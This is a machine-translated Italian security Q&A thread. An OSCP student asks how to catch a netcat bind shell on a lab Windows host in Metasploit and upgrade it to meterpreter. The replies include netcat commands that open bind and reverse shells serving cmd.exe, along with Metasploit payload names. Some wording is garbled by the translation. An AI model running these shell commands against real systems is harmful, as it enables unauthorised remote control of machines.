Usando msf per connettersi a listener netcat e shell_to_meterperter

3

Sto provando da ore e non riesco a fare qualcosa che dovrebbe essere semplice!

Ho una casella w / admin (prendendo OSCP - niente di illegale). Ho usato un exploit RDP, ho ottenuto una shell, ho aggiunto un utente, ho messo un utente nel gruppo degli amministratori e mentre mi trovo attualmente sono su un rdesktop con un amministratore.

Dato - TARGET - 192.168.1.200, ho una shell di amministrazione e accesso a rdesktop. Ho caricato nc.exe

KALI - La mia macchina - 192.168.1.100.

Quello che sto cercando di fare è aprire una porta LISTENING sul TARGET ... c: \ nc -lvp 9999 -e c: \ windows \ system32 \ cmd.exe

... connettersi a quella porta aperta dalla mia casella KALI mentre si utilizza il framework metasploit. Posso collegarmi usando nc 192.168.1.200 9999, ma non posso fare quella connessione una sessione di metasploit.

Quindi trasforma questa connessione in una sessione meterpreter usando postale / Multi / gestire / shell_to_meterpreter

Grazie!

    
posta Dan Miller 21.12.2015 - 23:51
fonte

2 risposte

2

L'ho preso !!!

link

Avevo bisogno di impostare il mio listener TARGET sulla porta 4444. Poi eseguo multi / handler, quindi payload windows / shell_bind_tcp

Sfrutta e ottengo la shell. Ctrl-Z per eseguire lo sfondo della sessione, quindi eseguire: %codice% sulla sessione e bam l'ha fatto girare!

    
risposta data 22.12.2015 - 03:08
fonte
1

schroeder è il massimo che dovresti connetterti al tuo cliente con nc -v 192.168.1.100 4040 (posiziona il tuo ip e la tua porta) o usa un windows/shell/bind_tcp payload dal msfconsole e poi aggiorna la sessione a meterpreter. inserisci la shell di explotation in meterpreter

e il secondo thig è, penso che non otterrai una connessione inversa dal tuo server solo da nc -nvl 9090 -e cmd.exe (questo comando apre la porta 9090 e reindirizza ogni input, output, a un'istanza di cmd e il suo "binding" server " -l option is to listen , per generare un server inverso con nc dovresti eseguire nc -v 10.10.1.10 4040 -e cmd.exe e la tua macchina come ascoltatore)

    
risposta data 22.12.2015 - 01:41
fonte

Leggi altre domande sui tag